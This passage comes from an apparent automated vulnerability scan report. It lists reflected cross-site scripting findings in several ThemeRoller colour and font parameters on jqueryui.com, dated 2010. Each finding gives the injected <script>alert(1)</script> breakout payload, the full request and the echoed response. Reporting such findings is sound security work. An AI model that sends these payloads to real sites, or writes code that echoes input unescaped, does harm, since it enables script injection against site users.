etLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121902d3"><script>alert(1)</script>d640d8b9ce9&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

2.157. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b5d"><script>alert(1)</script>44fc3456acc was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222236b5d"><script>alert(1)</script>44fc3456acc&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222236b5d"><script>alert(1)</script>44fc3456acc&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

2.158. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8a1"><script>alert(1)</script>0008e70e4e1 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555555f8a1"><script>alert(1)</script>0008e70e4e1&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555555f8a1"><script>alert(1)</script>0008e70e4e1&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

2.159. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf4c2"><script>alert(1)</script>73651ee13b2 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acf4c2"><script>alert(1)</script>73651ee13b2&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acf4c2"><script>alert(1)</script>73651ee13b2&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

2.160. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a94"><script>alert(1)</script>14458d207cd was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222268a94"><script>alert(1)</script>14458d207cd&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222268a94"><script>alert(1)</script>14458d207cd&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

2.161. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922fd"><script>alert(1)</script>bfebabdeafa was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636922fd"><script>alert(1)</script>bfebabdeafa&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636922fd"><script>alert(1)</script>bfebabdeafa&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

2.162. http://jqueryui.com/themeroller/ [fcHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567ab"><script>alert(1)</script>6bb62385672 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121567ab"><script>alert(1)</script>6bb62385672&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:29:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121567ab"><script>alert(1)</script>6bb62385672&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight
...[SNIP]...

2.163. http://jqueryui.com/themeroller/ [ffDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3de9"><script>alert(1)</script>10d22a8c27a was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serife3de9"><script>alert(1)</script>10d22a8c27a&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serife3de9"><script>alert(1)</script>10d22a8c27a&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgCol
...[SNIP]...

2.164. http://jqueryui.com/themeroller/ [fsDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba6c"><script>alert(1)</script>6024da5fef4 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em1ba6c"><script>alert(1)</script>6024da5fef4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em1ba6c"><script>alert(1)</script>6024da5fef4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

2.165. http://jqueryui.com/themeroller/ [fwDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd94f"><script>alert(1)</script>389a59d3bbf was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaldd94f"><script>alert(1)</script>389a59d3bbf&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:28:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normaldd94f"><script>alert(1)</script>389a59d3bbf&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

2.166. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cee7"><script>alert(1)</script>abd743a9c48 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

